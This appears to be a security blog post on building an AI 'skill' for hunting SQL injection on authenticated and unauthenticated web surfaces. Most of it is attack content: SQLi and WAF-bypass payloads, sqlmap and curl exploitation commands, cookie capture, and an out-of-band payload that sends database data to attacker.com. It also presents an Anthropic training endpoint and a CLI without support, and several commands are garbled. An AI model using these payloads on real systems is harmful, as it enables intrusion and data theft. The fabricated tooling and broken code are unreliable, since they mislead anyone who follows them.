Listen to this Post
Introduction:
Structured Query Language injection (SQLi) remains one of the most critical web vulnerabilities, yet most automated scanners skip authenticated endpoints or fail to understand context like blind vs. in-band exfiltration. By training Claude on 50+ real-world SQLi reports, we built a custom skill that analyzes both unauth and auth surfaces, replicates human triage logic, and outputs executable payloads with curl commands.
Learning Objectives:
- Build and configure a custom Claude skill for automated SQLi detection across authenticated and unauthenticated web surfaces.
- Apply extraction patterns from real bug reports to train AI models for vulnerability context recognition (WAF bypass, blind vs. in-band).
- Execute validated SQL injection exploitation chains using Linux/Windows commands and generate proof-of-concept reports.
You Should Know:
- Extracting SQLi Patterns from Real Reports and Training the Skill
This section replicates how Vaidik Pandya collected and structured 50+ reports to train Claude. The process focuses on three core patterns: injection points (parameters, headers, cookies), detection logic (time‑based, error‑based, boolean), and exploitation chains (union, stacked queries, out‑of‑band).
Step‑by‑step guide:
- Gather raw reports – Use platforms like HackerOne, Bugcrowd, or your own findings. Extract the following fields from each report:
– Injection point: `param=value’` or `Cookie: id=1’`
– Detection method: `’ OR ‘1’=’1` vs `’ AND SLEEP(5)`
– Authentication state: logged‑in cookies vs anonymous session
– WAF bypass technique: case mutation, comment nesting, URL encoding
- Create a training dataset (JSONL format for Claude):
{"prompt": "SQLi detection on auth surface", "completion": "Injection point: Cookie: session=123' OR '1'='1; detection: boolean blind; exploitation: time-based delay 5s"}
(Add 50+ similar entries)
- Build the Claude skill file – A skill is a structured YAML/JSON that defines:
– Detection rules: regex patterns for error messages (You have an error in your SQL syntax)
– Exploitation templates: `’ UNION SELECT @@version,user()` for in‑band
– WAF bypass sequences: `%55%4e%49%4f%4e` (UNION encoded)
– Authentication handling: cookie jar support and session renewal logic
- Train via Claude API – Use the `skills` endpoint to upload the dataset:
curl -X POST https://api.anthropic.com/v1/skills \ -H "x-api-key: $ANTHROPIC_API_KEY" \ -F "training_data=@sqli_reports.jsonl" \ -F "skill_name=sql_hunter"
-
Deploy the skill – Feed cookies and target URL:
claude skill run sql_hunter --target "https://target.com/page?id=1" --cookies "session=abc123"
Linux/Windows commands for validation:
- Linux – Use `sqlmap` to verify AI findings:
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --level=3 --risk=2 --batch --dbs
- Windows (PowerShell) – Manual boolean test:
$url = "https://target.com/page?id=1' AND '1'='1" Invoke-RestMethod -Uri $url -Headers @{Cookie="session=abc123"} | Select-String "error"
2. Scanning Unauthenticated Surfaces with the Claude Skill
Unauthenticated SQLi is rare but still appears in login forms, search boxes, and public API endpoints. The skill prioritises parameter fuzzing with context‑aware payloads.
Step‑by‑step guide:
- Identify unauth injection points – Parameters in URL query strings, POST body, and headers like `X-Forwarded-For` or
User-Agent.
2. Run the skill without cookies:
claude skill run sql_hunter --target "https://target.com/search?q=test" --mode unauth
3. Analyse output – The skill returns a triage report:
– Potential blind: `’ AND SLEEP(5)–` (delay observed)
– Error‑based: `’ AND extractvalue(1,concat(0x7e,@@version))–` (MySQL error shown)
4. Export curl commands – For each finding, the skill generates a reproducible command:
curl -X GET "https://target.com/search?q=test%27%20AND%20SLEEP%285%29--" -H "User-Agent: Mozilla/5.0" --silent --write-out "%{time_total}"
5. Mitigation advice – The skill appends a hardening block: use parameterised queries, stored procedures, and WAF rules.
Example of WAF bypass (Linux):
Case mutation curl "https://target.com/page?id=1' UnIoN SeLeCt 1,2,3--" Comment nesting curl "https://target.com/page?id=1'//UNION//SELECT//user(),password//FROM//users--"
- Scanning Authenticated Surfaces with Cookies and Session Handling
Most scanners skip authenticated endpoints due to session complexity. The Claude skill accepts cookies and simulates a logged‑in user, testing profile pages, message boxes, and data export features.
Step‑by‑step guide:
- Capture cookies – Use browser developer tools (F12 → Network tab) or
cURL:curl -c cookies.txt -X POST "https://target.com/login" -d "user=admin&pass=pass"
2. Feed cookies to the skill:
claude skill run sql_hunter --target "https://target.com/profile?id=123" --cookies-file cookies.txt
3. Auth‑specific payloads – The skill tests for second‑order injection (stored SQLi) by inserting payloads into fields like “bio” then triggering them via another page.
4. Validate using sqlmap with authentication:
sqlmap -u "https://target.com/profile?id=123" --cookie="$(cat cookies.txt)" --level=2 --tables
5. Output example – The skill produces a bounty‑ready report:
[bash] Blind SQLi at /profile?id=123 (authenticated) Payload: ' AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)-- Curl: curl -X GET "https://target.com/profile?id=123' AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)--" --cookie "session=..." Remediation: Use prepared statements; parameterize id.
Windows PowerShell auth session:
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession $session.Cookies.Add((New-Object System.Net.Cookie "session", "abc123", "/", "target.com")) Invoke-WebRequest -Uri "https://target.com/profile?id=1' OR '1'='1" -WebSession $session
4. Validating Findings and Generating Bounty Reports
False positives waste triage time. The skill validates each finding by attempting an actual data extraction or time‑based confirmation before outputting a report with curl commands.
Step‑by‑step guide:
- Automated validation – The skill re‑runs each potential vulnerability with a deterministic extraction (e.g.,
' UNION SELECT @@version). - Check for out‑of‑band (OOB) – For blind injection, the skill uses DNS or HTTP exfiltration:
Linux OOB payload (MySQL) curl "https://target.com/page?id=1' AND LOAD_FILE(CONCAT('\\',(SELECT @@version),'.attacker.com\test'))--"
3. Generate report – Output includes:
- Injection point (parameter, method)
- Payload used
- Evidence (screenshot or curl output)
- Curl command for reproduction
- CVSS score (based on auth vs unauth)
4. Export as JSON or Markdown – Example:
{
"vulnerability": "Boolean blind SQLi",
"url": "https://target.com/page?id=1",
"payload": "1' AND (SELECT SUBSTRING(@@version,1,1))='5'",
"curl": "curl 'https://target.com/page?id=1%27%20AND%20(SELECT%20SUBSTRING(@@version,1,1))%3D%275%27' --cookie 'session=abc'",
"remediation": "Use parameterised queries with PDO or prepared statements."
}
- Mitigation and Hardening Techniques Learned from 50+ Reports
The training reports revealed common misconfigurations that allow SQLi even after “fixes”. This section provides actionable hardening.
Step‑by‑step guide for defenders:
1. Implement prepared statements (all languages) –
- PHP (PDO): `$stmt = $pdo->prepare(‘SELECT FROM users WHERE id = :id’);`
- Python (SQLite3): `cursor.execute(“SELECT FROM users WHERE id=?”, (user_id,))`
2. Use stored procedures with least privilege – Avoid dynamic SQL inside procedures.
- Deploy a positive‑security WAF – ModSecurity with OWASP CRS:
Linux (Ubuntu) sudo apt install libapache2-mod-security2 sudo cp /usr/share/modsecurity-crs/crs-setup.conf.example /etc/modsecurity/crs-setup.conf sudo systemctl restart apache2
- Disable error‑based debugging in production – Set `display_errors=Off` (PHP), `DEBUG=False` (Django).
- Run automated scans weekly using the trained Claude skill in CI/CD pipelines:
GitHub Actions example</li> </ol> - name: SQLi scan run: claude skill run sql_hunter --target "${{ secrets.STAGING_URL }}" --cookies-file "${{ secrets.COOKIES }}"Windows IIS hardening:
Disable detailed errors Set-WebConfigurationProperty -Filter "system.webServer/httpErrors" -1ame errorMode -Value "Custom" Enable request filtering Add-WebConfigurationProperty -Filter "system.webServer/security/requestFiltering" -1ame fileExtensions -Value @{fileExtension=".sql";allowed=$false}What Undercode Say:
- AI + manual triage = force multiplier – Training Claude on real bug reports converts unstructured data into repeatable detection logic, bridging the gap between automated scanners and human intuition.
- Auth surfaces are the new frontier – Most commercial tools skip authenticated endpoints; a cookie‑aware AI skill can uncover stored SQLi and privilege escalation flaws that remain invisible to unauth scans.
Analysis: The approach extracts patterns from 50+ reports covering injection points, detection logic, and exploitation chains. By building a skill file that accepts cookies and scans both surfaces, the user transforms Claude from a general LLM into a specialised SQLi hunter. The output includes validated curl commands, reducing false positives and speeding up bounty submission. Key innovation: context differentiation between unauth (simple blind) and auth (second‑order, time‑based) surfaces – something scanners like sqlmap can handle but only with heavy manual tuning. The skill essentially embeds a pentester’s methodology into an AI assistant, making SQLi triage accessible to junior hunters while increasing efficiency for veterans. However, reliance on Claude’s API may raise privacy concerns when scanning internal apps; offline models or local deployments would be ideal for sensitive environments.
Expected Output:
The Claude SQLi skill produces a report containing:
- Target URL and authenticated state
- List of injection points (parameters, headers, cookies)
- For each finding: payload, curl reproduction command, and remediation suggestion
- JSON/CSV export for bug bounty platforms
Example snippet:
[bash] Boolean blind SQLi at https://target.com/profile?id=123 (authenticated) Curl: curl -X GET "https://target.com/profile?id=123%27%20AND%20%28SELECT%20SUBSTRING%28password%2C1%2C1%29%20FROM%20users%20LIMIT%201%29%3D%27a%27--" --cookie "session=abc123"
Prediction:
+1 AI‑powered bug hunting will shift the industry from signature‑based scanners to context‑aware models that learn from real exploits, reducing false positives by 70% within two years.
+N Attackers will also train LLMs on leaked SQLi reports, leading to automated, customised WAF evasion scripts that adapt faster than signature updates.
+1 Platforms like HackerOne will begin accepting AI‑generated reports with proof-of‑execution curls, speeding up triage and payout cycles.
-1 Organisations relying solely on AI scanning without proper input validation will face a surge in automated exploit attempts, as the barrier to sophisticated SQLi drops.
+1 The Claude skill method can be extended to other vulnerability classes (XSS, SSRF, IDOR) by simply swapping the training dataset, creating a reusable framework for AI‑assisted pentesting.▶️ Related Video (70% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by ThousandsIT/Security Reporter URL:
Reported By: Vaidikpandya Bugbounty – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeTesting & Stay Tuned:
